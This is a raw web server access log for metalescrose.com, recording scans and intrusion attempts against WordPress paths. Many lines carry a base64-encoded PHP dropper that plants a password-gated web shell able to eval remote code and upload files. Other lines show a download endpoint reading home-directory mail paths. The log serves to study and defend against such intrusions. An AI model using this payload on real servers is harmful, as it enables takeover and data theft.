192.121.16.196 - - [07/Dec/2025:15:15:35 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:50.0) Gecko/20100101 Firefox/50.0"
192.121.16.196 - - [07/Dec/2025:15:25:56 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
192.121.16.196 - - [07/Dec/2025:15:25:56 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
198.186.131.59 - - [07/Dec/2025:15:34:56 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
66.249.64.108 - - [07/Dec/2025:15:38:08 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9tYWlsL25ldy8xNzUxNDIwNTk5Lk02NDI3NTJQMzQ0MTE0MS5hbHRhcjQzLnN1cHJlbWVwYW5lbDQzLmNvbSxTPTMzMTgsVz0zMzg5 HTTP/1.1" 200 1330 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.186.131.59 - - [07/Dec/2025:15:45:32 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
198.186.131.59 - - [07/Dec/2025:15:45:32 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
192.121.16.196 - - [07/Dec/2025:15:25:56 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0"
198.186.131.59 - - [07/Dec/2025:15:34:39 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
198.186.131.59 - - [07/Dec/2025:15:34:56 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
198.186.131.59 - - [07/Dec/2025:15:34:56 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
198.186.131.59 - - [07/Dec/2025:15:34:57 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
198.186.131.59 - - [07/Dec/2025:15:45:22 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
66.249.64.109 - - [07/Dec/2025:15:48:35 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC90bXAvYXdzdGF0cy9hd3N0YXRzMTAyMDI0Lm1ldGFsZXNjcm9zZS5jb20udHh0 HTTP/1.1" 200 23200 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
194.68.32.135 - - [07/Dec/2025:15:54:46 +0000] "GET / HTTP/1.1" 200 1727 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2684.2 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:15:55:06 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2684.2 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:15:55:07 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2684.2 Safari/537.36"
194.68.32.135 - - [07/Dec/2025:15:55:08 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2684.2 Safari/537.36"
66.249.64.109 - - [07/Dec/2025:15:59:00 +0000] "GET /aeee1/?download=L2hvbWUvaTQ0NjY5OC9tYWlsL21ldGFsZXNjcm9zZS5jb20vY29udGFjdC9zdWJzY3JpcHRpb25z HTTP/1.1" 200 20 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.186.131.59 - - [07/Dec/2025:16:03:41 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
